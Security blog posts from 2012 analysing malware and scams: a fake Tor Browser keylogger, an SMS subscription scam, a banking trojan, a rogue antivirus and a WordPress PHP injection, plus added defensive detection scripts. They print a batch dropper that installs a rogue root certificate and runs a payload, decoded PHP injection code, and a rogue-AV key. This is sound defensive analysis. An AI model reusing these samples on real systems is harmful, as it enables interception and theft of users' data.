Thursday, November 29, 2012

Analysis of the TOR_Browser malware

694DD57886B32AD850224A783198D9FE, 10D52767B537B2F9F564481665B029E6, 761EA80A1C0019D6CB606BB646EBE57F

The sample has already been circulating for a few weeks, but there is still little information about this malware on the internet, so I decided to do a quick analysis.

Basic File Information
Received filename : Tor_Browser.exe
Original filename : suf70_launch.exe
Executable vendor : Indigo Rose Corp.
File size : 707,793 bytes

The original filename and vendor identify the wrapper as the launcher stub of Indigo Rose's Setup Factory installer builder, a commodity tool, so they say nothing about who built the dropper.

MD5 hashes from the report:
694DD57886B32AD850224A783198D9FE (installer file, 707,793 bytes)
10D52767B537B2F9F564481665B029E6 (malicious PE file, 9,080 bytes)
761EA80A1C0019D6CB606BB646EBE57F (malicious PE file, 74,240 bytes)

MD5 hash from the official website:
The official installer is about 22 MB, while the sample is only about 700 KB.


The sample we received is a PE installer that uses the Tor Project file icon. During the installation wizard, the user will notice that no EULA appears on the screen:

The installer is a malware dropper. After installation finishes, the malware does not execute automatically; it needs user interaction, either a reboot (which triggers the Startup shortcut described below) or a manual launch from the Start Menu.

If the user runs it from the Start Menu, C:\Program Files\Tor Browser\Tor_Browser.exe is executed. This PE file then launches a second process from:
C:\Users\<user profile>\AppData\Local\Temp\explorer.exe
Note the path: the legitimate explorer.exe lives in C:\Windows, so an explorer.exe running from a user's Temp folder is a strong indicator on its own. Tor_Browser.exe then runs a %RANDOMNAME%.bat dropped in the Windows Temp folder, which deletes Tor_Browser.exe once that process has terminated.

The fake explorer.exe process performs several malicious activities: it logs keystrokes, stores them in encrypted form, and resolves the malware author's domain name to an IP address.

The explorer.exe process stays resident in memory.

Process Activity

Upon execution, the sample creates the following mutex:

This ensures that only a single instance of the malware is running.

File & folder

Upon installation the following files are created:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tor Browser\
    Tor Browser.lnk

C:\Users\<user profile>\AppData\Roaming\Help\
    CREATELINK.EXE (legitimate tool used to create a shortcut link)
    IconCacheBt.DAT (encrypted fake explorer.exe)
    IconConfig.DAT (encrypted keylogger configuration)

C:\Program Files\Tor Browser\Tor_Browser.exe
C:\Windows\Tor Browser\uninstall.exe -- non-malicious file
C:\Users\<user profile>\AppData\Local\Temp\explorer.exe

The malware also creates a shortcut in the user's Startup folder so that it runs at every logon:
C:\Users\<userprofile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The shortcut points to the following file location:

Windows Registry

The malware creates the following registry key:

NOTE: This registry key marks the current machine as already infected.
The malware also reads the following registry key:
and tries to read the value "~MHz", which stores the current CPU speed; malware frequently reads this value as a crude virtual-machine or sandbox check.

Keylogger Activity

Keystrokes typed by the user are saved to the following file:
C:\Users\<user profile>\AppData\Local\Temp\win_32.sys

All captured keystrokes are stored in obfuscated form (the malware uses a compression library rather than real encryption).


It tries to connect to the following IP:
A domain name was also found in the malware; it tries to resolve it using the following DNS server:


The malware sample (iexplore.exe) also contains an embedded digital certificate, while the fake explorer.exe carries none.

The certificate may have been stolen; it has since been revoked.
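The file-system indicators above can be turned into a host sweep. The following Python script is an added example, not part of the original post: it checks the dropped-file locations listed above (the three files under AppData\Roaming\Help, the fake explorer.exe and win_32.sys in %TEMP%, the Start Menu shortcut and the installed Tor_Browser.exe) and hashes anything it finds against the three reported MD5s. The post does not name the shortcut dropped into the Startup folder, so every .lnk there is listed for review rather than matched by name. The mutex and registry indicators are not covered. The demo tree it sweeps is constructed with placeholder bytes so the script runs offline; on a real Windows host you would call sweep("C:/", USERPROFILE).

```python
"""Added example: offline host IOC sweep for the fake Tor_Browser dropper."""
import hashlib
import tempfile
from pathlib import Path

# MD5s as reported in the analysis above.
KNOWN_MD5 = {
    "694dd57886b32ad850224a783198d9fe": "Tor_Browser.exe installer (707,793 bytes)",
    "10d52767b537b2f9f564481665b029e6": "malicious PE (9,080 bytes)",
    "761ea80a1c0019d6cb606bb646ebe57f": "malicious PE (74,240 bytes)",
}

# Dropped files relative to the user profile (C:\Users\<user>) ...
PROFILE_IOCS = [
    "AppData/Roaming/Help/CREATELINK.EXE",
    "AppData/Roaming/Help/IconCacheBt.DAT",   # encrypted fake explorer.exe
    "AppData/Roaming/Help/IconConfig.DAT",    # encrypted keylogger config
    "AppData/Local/Temp/explorer.exe",        # the real one lives in C:\Windows
    "AppData/Local/Temp/win_32.sys",          # keystroke log
]
# ... and relative to the system volume (C:\).
VOLUME_IOCS = [
    "Program Files/Tor Browser/Tor_Browser.exe",
    "ProgramData/Microsoft/Windows/Start Menu/Programs/Tor Browser/Tor Browser.lnk",
]
# The analysis says a shortcut is added here but does not name it, so every
# .lnk in the folder is listed for manual review.
STARTUP_DIR = "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"


def md5_of(path):
    """MD5 of a file, read in chunks so a large installer is not loaded whole."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(volume, profile, known=KNOWN_MD5):
    """Return {'present': [...], 'hashes': {path: description}, 'startup': [...]}."""
    volume, profile = Path(volume), Path(profile)
    candidates = [profile / p for p in PROFILE_IOCS] + [volume / p for p in VOLUME_IOCS]
    present = [str(p) for p in candidates if p.exists()]
    hashes = {}
    for p in candidates:
        if p.is_file():
            digest = md5_of(p)
            if digest in known:
                hashes[str(p)] = known[digest]
    startup_dir = profile / STARTUP_DIR
    startup = sorted(str(p) for p in startup_dir.glob("*.lnk")) if startup_dir.is_dir() else []
    return {"present": present, "hashes": hashes, "startup": startup}


def infected(findings):
    """A hash match is conclusive; two or more dropped paths is a strong signal on its own."""
    return bool(findings["hashes"]) or len(findings["present"]) >= 2


def build_demo_tree(base):
    """Constructed profile/volume layout mimicking the infection (placeholder bytes only)."""
    base = Path(base)
    profile, volume = base / "Users" / "victim", base / "volume"
    for rel in ("AppData/Roaming/Help/IconCacheBt.DAT",
                "AppData/Local/Temp/explorer.exe",
                "AppData/Local/Temp/win_32.sys"):
        target = profile / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(b"placeholder for " + rel.encode())
    lnk = profile / STARTUP_DIR / "autorun item.lnk"   # the real name is not given; assumed
    lnk.parent.mkdir(parents=True, exist_ok=True)
    lnk.write_bytes(b"L")
    volume.mkdir(parents=True, exist_ok=True)
    return volume, profile


def demo():
    """Sweep the constructed tree. The placeholder explorer.exe's own MD5 is added
    to the known list so the hash-match path is exercised as well."""
    with tempfile.TemporaryDirectory() as tmp:
        volume, profile = build_demo_tree(tmp)
        known = dict(KNOWN_MD5)
        known[md5_of(profile / "AppData/Local/Temp/explorer.exe")] = "constructed fake explorer.exe"
        return sweep(volume, profile, known)


if __name__ == "__main__":
    result = demo()
    for key, value in result.items():
        print(key, value)
    print("infected:", infected(result))
```

Run against a live machine, the hash matches are the conclusive part; the path hits alone are still worth acting on because an explorer.exe in Temp has no legitimate reason to exist.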

Monday, November 26, 2012

Twitter Spam Bot 'Seducing' You

Well, not directly. It mentions your name on Twitter first. For almost a week now I have been receiving tweets that suddenly mention my nickname. It looks suspicious when these accounts are not even following me, and the message text has nothing to do with my interests.

At the time of writing, these spammers are still actively tweeting and randomly mentioning people's names, averaging around 20 tweets per day.

As the screenshot shows, it is not only that one account that keeps randomly mentioning people; several other spammers use different names but post almost the same message produced by their spam 'bot'. The Virus Bulletin team also sent some screenshots of this Twitter spam activity.

Most of the spam 'bot' names start with the prefix 'Caprigalxxx' ('x' being a random letter or digit), but other names occur too. These 'random' accounts really exist and always use seductive pictures to attract more followers.

Here is another example screenshot. Most of the spammer accounts look like this.

Sunday, September 2, 2012

Investigation behind Malaysian SMS spam with .jar attachment (0195451395).

I have repeatedly received SMS spam with a .jar file as an attachment, several times within three months, so I decided to dig into who is behind this activity.

The phone number used by the spammer:
+6019-5451395 (Can be several other phone numbers)

The SMS message contains a URL that redirects to another server providing the download link:
hxxp:// ---> hxxp://

The .jar file looks suspicious, and an attachment like this is an inappropriate way to promote anything. Let's try accessing the IP in a browser.

The IP resolves to the domain name . It seems to be running IIS on a Windows machine. Now let's run Nmap against it.

Host is up (0.011s latency).
Not shown: 979 closed ports
21/tcp    open     ftp            Microsoft ftpd
25/tcp    filtered smtp
80/tcp    open     http           Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_http-title: 403 - Forbidden: Access is denied.
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
1026/tcp  filtered LSA-or-nterm
1027/tcp  filtered IIS
1433/tcp  open     ms-sql-s       Microsoft SQL Server 2008
2383/tcp  open     ms-olap4?
3389/tcp  open     microsoft-rdp  Microsoft Terminal Service
4444/tcp  filtered krb524
6129/tcp  filtered unknown
6667/tcp  filtered irc
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
1 service unrecognized despite returning data.
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (94%), FreeBSD 6.X (86%)
Aggressive OS guesses: Microsoft Windows Server 2008 SP2 (94%), Microsoft Windows 7 (94%), Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7 (94%), Microsoft Windows Server 2008 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 Professional (93%), Microsoft Windows Server 2008 Beta 3 (93%), Microsoft Windows 7 Ultimate (92%), Microsoft Windows Vista Business SP1 (91%), Microsoft Windows Vista Home Premium SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
Service Info: OS: Windows

TRACEROUTE (using port 8888/tcp)
1   8.00 ms
2   5.00 ms
3   5.00 ms
4   8.00 ms
5   12.00 ms
6   11.00 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds

The following are the only ports reachable from the internet. Having MS SQL Server (1433), RDP (3389) and the high dynamic RPC ports (49152-49161) exposed directly to the internet is notable in itself:
21/tcp    Microsoft ftpd
80/tcp    Microsoft IIS httpd 7.5
1433/tcp  Microsoft SQL Server 2008
2383/tcp  ms-olap4?
3389/tcp  microsoft-rdp  Microsoft Terminal Service
49152/tcp Microsoft Windows RPC
49153/tcp Microsoft Windows RPC
49154/tcp Microsoft Windows RPC
49155/tcp Microsoft Windows RPC
49160/tcp Microsoft Windows RPC
49161/tcp Microsoft Windows RPC
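Picking the reachable ports out of a scan by hand, as above, does not scale past one host. The Python below is an added example, not part of the original post: it parses Nmap's normal output into a port table, keeps only the 'open' rows (a 'filtered' state means a firewall dropped the probe, not that the service answered) and flags the services that should never face the internet. SAMPLE is a copy of the port lines from the scan above, embedded so the script runs offline; the list of sensitive ports is the editor's choice, not the post's.

```python
"""Added example: parse Nmap normal output into a port table and flag exposures."""
import re

# Constructed from the port-table lines of the scan above.
SAMPLE = """\
Host is up (0.011s latency).
Not shown: 979 closed ports
21/tcp    open     ftp            Microsoft ftpd
25/tcp    filtered smtp
80/tcp    open     http           Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_http-title: 403 - Forbidden: Access is denied.
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
1026/tcp  filtered LSA-or-nterm
1027/tcp  filtered IIS
1433/tcp  open     ms-sql-s       Microsoft SQL Server 2008
2383/tcp  open     ms-olap4?
3389/tcp  open     microsoft-rdp  Microsoft Terminal Service
4444/tcp  filtered krb524
6129/tcp  filtered unknown
6667/tcp  filtered irc
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
"""

# One port-table row: "<port>/<proto>  <state>  <service>  [<version>]".
# NSE script output ("| ...") and summary lines do not match and are skipped.
PORT_RE = re.compile(
    r"^(\d{1,5})/(tcp|udp|sctp)\s+"
    r"(open|closed|filtered|unfiltered|open\|filtered|closed\|filtered)\s+"
    r"(\S+)(?:\s+(.*\S))?\s*$"
)

# Services that should not face the internet at all; flagged when open.
SENSITIVE = {
    21: "FTP: cleartext credentials",
    1433: "Microsoft SQL Server",
    2383: "SQL Server Analysis Services",
    3389: "RDP",
}


def parse_ports(text):
    """Return a list of dicts, one per port-table row, in scan order."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version or ""})
    return rows


def reachable(rows):
    """Only 'open' ports accepted a connection; 'filtered' means a firewall dropped the probe."""
    return [r for r in rows if r["state"] == "open"]


def risky_exposures(rows):
    """(port, reason) for open ports that should never be internet-facing. Dynamic
    RPC ports (49152+) are flagged too: they expose RPC interfaces directly even
    though the endpoint mapper on 135/tcp is filtered."""
    out = []
    for r in reachable(rows):
        if r["port"] in SENSITIVE:
            out.append((r["port"], SENSITIVE[r["port"]]))
        elif r["service"] == "msrpc" and r["port"] >= 49152:
            out.append((r["port"], "dynamic RPC endpoint"))
    return out


if __name__ == "__main__":
    rows = parse_ports(SAMPLE)
    for r in reachable(rows):
        print(f"{r['port']}/{r['proto']:<4} {r['service']:<14} {r['version']}")
    for port, reason in risky_exposures(rows):
        print(f"exposed: {port} ({reason})")
```

The same parser works on any host's normal output (nmap -oN), so the exposure list can be produced for a whole range rather than read off one screen.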

Now we need to take a look at the .jar file. First, let's see what it looks like running on a phone; in this case I used the Nokia emulator.

Once the victim runs the spam app, it immediately pops up a prompt to send a message to the short code 33375. If the user clicks/taps Yes, it automatically subscribes them to a RM3.00 service for more spam data, and RM3.00 of credit is 'stolen' every month.

The SMS traffic is shown in detail in the image above. Let's take a look at the .jar source code below:

The variables paramString1 and paramString3 correspond to values read from the manifest file.

Looking at the 'c' class in the source code, there is another shortened link that redirects to their Terms and Conditions web page.

The shortened link redirects as follows:
hxxp:// ---> hxxp://

Based on their T&C, Million Progain Sdn Bhd (916763-X) is the company responsible for receiving payments from users. Several of the T&C have also been violated by this company. I'll keep the details about this company, since it seems to lead to more abusive services.

Sunday, August 26, 2012

Whatsapp Hoax Message Still in Circulation

It seems a viral message with hoax content is still circulating on my WhatsApp. It has been a few months since it first appeared in January 2012. Hopefully there will be no more forwarded messages like this.

Full hoax message:
Message from Jim Balsamic (CEO of Whatsapp) we have had an over usage of user names on whatsapp Messenger. We are requesting all users to forward this message to their entire contact list. If you do not forward this message, we will take it as your account is invalid and it will be deleted within the next 48 hours. Please DO NOT ignore this message or whatsapp will no longer recognise your activation. If you wish to re-activate your account after it has been deleted, a charge of 25.00 will be added to your monthly bill. We are also aware of the issue involving the pictures updates not showing. We are working diligently at fixing this problem and it will be up and running as soon as possible. Thank you for your cooperation from the Whatsapp team” WhatsApp is going to cost us money soon. The only way that it will stay free is if you are a frequent user i.e. you have at least 10 people you are chatting with. To become a frequent user send this message to 10 people who receive it (2 ticks) and your WhatsApp logo

WhatsApp has already announced on their blog that this really is a hoax.

Tuesday, August 14, 2012

Trojan Banker/Password Stealer (B99A6FF84E4404488D789F5D56593735)

Yesterday I found that a local website had been compromised and embedded with malicious code. Once a user visits the site and allows the Java applet to run, the malware is downloaded and installed.

The picture above shows that you are prompted to enable the Java plug-in to use some 'features' on this website. Let's look at the page source. The red-highlighted part in the picture below is a Windows batch command that drops a VBScript file, which in turn downloads another piece of malware (a Windows executable) from an Israeli website, which has possibly also been compromised.

As we can see, extra code has been embedded in the site's main page. At the top it calls the Java applet (Dantas.jar), which is what runs the Windows batch command. Below is the Java applet code.

If the batch command executes successfully, it saves the VBScript code into the Windows temporary directory as eden.vbs, then runs eden.vbs to download and execute the malware executable.

The bottom of the page has also been seeded with pharma/Viagra scam hyperlinks.

Now we need to take a closer look at the PE file downloaded from the following link:
hxxp:// (a1d2a281980fdd75546557a9ba6de0a6)

The PE file is actually an SFX (self-extracting) archive. It contains several files, including a certificate from the malware author.

FileName         MD5                               Description
certadm.dll      AED39116FE12C5550975043DA1D1B244  Microsoft Certificate Services Admin
certnew.cer      2B742FEB1883EE5CB418B1CBAB145A7D  Fake security certificate
certutil.exe     711DB2EF10B6C2AB2080698AEC6C6D08  certutil.exe
givetome.exe     6D2C398E03397C9D089EDC0F00AB3FCB
jeovahjireh.exe  0B2BF362548B244477D9FFB613AF54D4  Malware

The only obviously suspicious file is 'jeovahjireh.exe', so we need to look closer at it. The file is compressed with UPX 3.07 and is a Bat2Exe-style binder: the PE wraps a Windows batch script, reproduced below.
@break off

REM Junk: random strings echoed into a .dat file as padding (repeated many times)
echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat

set inf=0
set exe="%temp%\msavc.exe"

REM Infection marker named after the current user: skip the install if it already exists
if exist %temp%\%USERNAME%.dll goto mapa

> %temp%\%USERNAME%.dll echo y

REM givetome.exe is invoked with the target path; the downloaded .jip file ends up here as msavc.exe
%temp%\givetome.exe "%exe%"

del "%temp%\leiame.txt"

ECHO -------------------------------------------------------------------------------
REM Install certnew.cer into the Trusted Root CA store (bundled certutil first, then the system one)
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer

REM Run the downloaded payload
cmd.exe /c "%exe%"

REM Remove the helper files
del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe

REM More junk padding follows
echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat

. . .

echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat

The code is lengthy and semi-obfuscated; most of it is useless padding, so I have cut out some of the junk. The Portuguese file name leiame.txt ('read me') is a hint that the dropper is of Brazilian origin, which is common for banking trojans of this kind.

What the batch script actually does is download another PE file from the following URL:

The *.jip file is saved as 'msavc.exe' in the temp directory. The script then adds 'certnew.cer' to the machine's Trusted Root Certification Authorities store (certutil -addstore root). This is the dangerous step for a banking trojan: with an attacker-controlled root CA trusted by Windows, attacker-issued TLS certificates for banking sites are accepted without warning by Internet Explorer and every other application that uses the Windows certificate store (Firefox keeps its own store and is not affected by this alone). On a suspect machine, 'certutil -store root' lists the installed root certificates so the rogue one can be identified and removed with 'certutil -delstore root <certificate hash or serial number>'.

Then it executes 'msavc.exe' via cmd.exe and deletes all the bundled files (certnew.cer, certadm.dll, certutil.exe, givetome.exe).
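Droppers built this way are mostly padding, and reading them by hand is slow. The Python below is an added example, not part of the original post: it performs a static triage of a Bat2Exe-style script like the one above, strips the junk 'echo <garbage> >> %temp%\...dat' lines, resolves %variables% set earlier in the script, and pulls out what matters to a responder: the infection marker, any certificate pushed into the Root store, the helper invoked to fetch the payload, the payload that is executed, and the files cleaned up afterwards. SAMPLE is a constructed subset of the script quoted above; the regexes cover the constructs seen there and are an assumption for other droppers.

```python
"""Added example: static triage of a Bat2Exe-style batch dropper."""
import re

# Constructed subset of the dropper script quoted above.
SAMPLE = r"""@break off

echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat

set inf=0
set exe="%temp%\msavc.exe"

if exist %temp%\%USERNAME%.dll goto mapa

> %temp%\%USERNAME%.dll echo y

%temp%\givetome.exe "%exe%"

del "%temp%\leiame.txt"

ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer

cmd.exe /c "%exe%"

del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe

echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
"""

SET_RE = re.compile(r"^set\s+(\w+)=(.*)$", re.I)
# Padding: an echo of garbage redirected into a .dat file under %temp%/%tmp%.
JUNK_RE = re.compile(r"^echo\b.*>>?\s*%te?mp%\\[^\s>]+\.dat\b", re.I)
CERT_RE = re.compile(r"certutil(?:\.exe)?\s+-addstore\s+(\w+)\s+(\S+)", re.I)
MARK_RE = re.compile(r"^if\s+exist\s+(\S+)\s+goto\s+\w+", re.I)
RUN_RE = re.compile(r"^cmd(?:\.exe)?\s+/c\s+(.+)$", re.I)
EXE_RE = re.compile(r"^(%te?mp%\\\S+\.exe)\s*(.*)$", re.I)
DEL_RE = re.compile(r"^del\b(?:\s+/\w+)*\s+(.+)$", re.I)


def expand(value, env):
    """Expand %name% using variables set earlier in the script; unknown names stay literal."""
    return re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), value)


def unquote(s):
    return s.strip().strip('"')


def triage(script):
    """Classify each line of a batch dropper and return the findings."""
    env = {}
    report = {"junk_lines": 0, "marker": None, "root_certs": [],
              "helpers_run": [], "payloads": [], "deleted": [], "other": []}
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if JUNK_RE.match(line):
            report["junk_lines"] += 1
        elif m := SET_RE.match(line):
            env[m.group(1).lower()] = unquote(m.group(2))
        elif m := MARK_RE.match(line):
            report["marker"] = m.group(1)           # "already infected" check
        elif m := CERT_RE.search(line):
            cert = m.group(2)
            if m.group(1).lower() == "root" and cert not in report["root_certs"]:
                report["root_certs"].append(cert)  # rogue root CA being installed
        elif m := RUN_RE.match(line):
            report["payloads"].append(expand(unquote(m.group(1)), env))
        elif m := EXE_RE.match(line):
            report["helpers_run"].append((m.group(1), expand(unquote(m.group(2)), env)))
        elif m := DEL_RE.match(line):
            report["deleted"].append(unquote(m.group(1)))
        else:
            report["other"].append(line)           # left for manual review
    return report


def is_dropper(report):
    """Installing a root certificate and then executing something from %temp% is the tell."""
    return bool(report["root_certs"]) and bool(report["payloads"])


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key:12} {value}")
```

Anything that lands in 'other' (here the '@break off' line, the marker creation and the ECHO separator) is what still needs a human look; on this sample the triage leaves three such lines out of the whole script.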

Now we need to take a look at the newly downloaded PE file (B99A6FF84E4404488D789F5D56593735), saved as 'msavc.exe'. This file is packed with UPX 3.08 and written in Borland Delphi.

Based on the VirusTotal result, the PE file is most likely a trojan stealer, password stealer or banking trojan, which steals user information from victims' PCs.

As we can see in the network traffic, it tries to access the following URL with parameters appended:

The domain name is still active, but the content at the given URL is no longer available.

The malware also creates several mutexes and crawls through several sensitive directories.

It also makes changes in many places in the Windows registry to lower security settings and to read the internet settings.

Online Sandbox Result:

Monday, August 13, 2012

Live Security Platinum (Rogue AV)

A couple of weeks ago I received a rogue AV sample disguised as 'Live Security Platinum'. This malware was already discovered by other people a few months ago. Once installed, it marks all your executable files as 'infected', and none of them can be run until you purchase their 'security' antivirus program. Let's take a look at a basic dynamic analysis here; this write-up does not cover removing it from your system in detail.

The sample I received came from a compromised website embedded with a Java object that requires users to allow their browser to execute a .jar file. This .jar file then downloads the .exe installer of the 'Live Security Platinum' malware.

The snapshot above shows the first run of the malware, which checks for the latest update, then downloads and installs it. The install path is under the user's program data; see the image below.

After installing, it automatically performs a fake 'scan'. At this point none of your applications can be executed; they are all blocked by the malware.

If you try to run any application on your computer, you get a fake notification saying that your computer has been infected by 'malware'.

It keeps reminding you to update and purchase their 'software'.

Let's try entering a valid serial number into the malware's registration form. The key I entered is AA39754E-715219CE. This key is already circulating on the internet, so I just used it to make removing the infection easier.

Once you click the 'Activate' button, you are told that you have successfully registered their 'product', and all your applications can run normally again. You will also notice that the rogue AV window has changed to a light blue colour and that there is an extra shortcut icon on your desktop: a URL shortcut to the malware website.

If we open the URL, there is an online user guide for users to read. As of now, the website is still accessible.

For removal, Malwarebytes Anti-Malware should be fine for cleaning up the whole infection.

Saturday, May 26, 2012

Parasite PHP script on victim website (

While helping a victim remove a phishing site from their website and patch it, I found interesting malicious code inside the WordPress-based site. The case began when the victim's site was found hosting phishing pages, in several directories, disguised as CIMB Bank. While updating to the new WordPress version and all the plugins, I noticed something wrong with the size of the index.php files. I had also installed the SIG (Silence Is Golden) plugin to block directory listing; it installs an empty index.php file in each directory.

After finishing the basic patches, I noticed that the 'empty' index.php file was not empty. Opening it up, I found this:

This is definitely not good. Let's decode the base64-encoded eval() part and see what we get.
if (!$qazplm){
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"") or stristr($referer,"") or stristr($referer,"") or stristr($referer,"") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"") or stristr($referer,"") or stristr($referer,"")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

The decoded code above shows that any visitor arriving with a matching search-engine referer is reported to '' via the referer. The script is set not to run for IE 7. The file doing the infecting turned out to be the WordPress script '/wp-admin/plugins.php'. Let's take a look.

Well, just what I expected. There is an infection script at the beginning of the file, and at the bottom there is a huge base64-encoded string passed to eval(). After decoding, all the encoded scripts appear to be the same, inserted at random positions within plugins.php, which causes plugins.php to generate many errors.

Since the infection had hit every .php file with the same script, I decided to replace all WordPress files with fresh copies. After that, some infected scripts remained, especially in their custom theme. A special script was needed to crawl for and find all the infected files. Thanks to for writing a nice PHP script to detect PHP web shells, which also works in this case. After running the script, more than 100 PHP files were still found to be infected. I removed some unused plugins and themes and had to fix some files manually. Comparing every core file against the checksums of the official release (for example with WP-CLI's 'wp core verify-checksums') is a quicker way to spot modified core files, but it does not cover themes and plugins, which is exactly where the leftovers were.

The domain '' seems to be down already, so I can't take the analysis further, but others have already analysed what happened. I noticed that it affected not only WordPress but also other popular CMSs such as Joomla, Drupal and so on.
!topic/webmasters/SuUGJWwbqeA
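The clean-up above hinged on finding every file carrying an eval() of a base64 blob. The Python below is an added example, not the original post's tooling: it walks a directory, locates eval(base64_decode('...')) in every .php file, decodes the payload and tags it with the behaviours worth flagging (referer and User-Agent checks, a search-engine list, a redirect, a remote fetch, a nested eval). The infected sample it scans is constructed for this example: its payload is modelled on the decoded script shown above, and the callback host attacker.example stands in for the domain stripped from the post; the indicator list is the editor's.

```python
"""Added example: find and decode eval(base64_decode(...)) injections in PHP files."""
import base64
import re
import tempfile
from pathlib import Path

EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)", re.I)

# Behaviours worth flagging in a decoded payload.
INDICATORS = {
    "referer_check": re.compile(r"HTTP_REFERER|\$referer\b", re.I),
    "search_engines": re.compile(r"yahoo|bing|google|yandex|rambler", re.I),
    "ua_filter": re.compile(r"HTTP_USER_AGENT|MSIE", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "remote_fetch": re.compile(r"file_get_contents|curl_init|fsockopen", re.I),
    "nested_eval": re.compile(r"\beval\s*\(", re.I),
}


def decode_payloads(php_source):
    """Decode every eval(base64_decode('...')) and tag it with the indicators it trips."""
    out = []
    for m in EVAL_B64.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:   # not valid base64: leave for manual review
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        out.append({"offset": m.start(), "decoded": decoded, "indicators": hits})
    return out


def scan_tree(root):
    """{path: payloads} for every .php file under root that carries an injection."""
    results = {}
    for p in sorted(Path(root).rglob("*.php")):
        found = decode_payloads(p.read_text(errors="replace"))
        if found:
            results[str(p)] = found
    return results


# Constructed payload modelled on the decoded snippet above (search-engine
# referer check, IE7 excluded, cache/inurl queries excluded), with a
# hypothetical redirect to attacker.example standing in for the stripped host.
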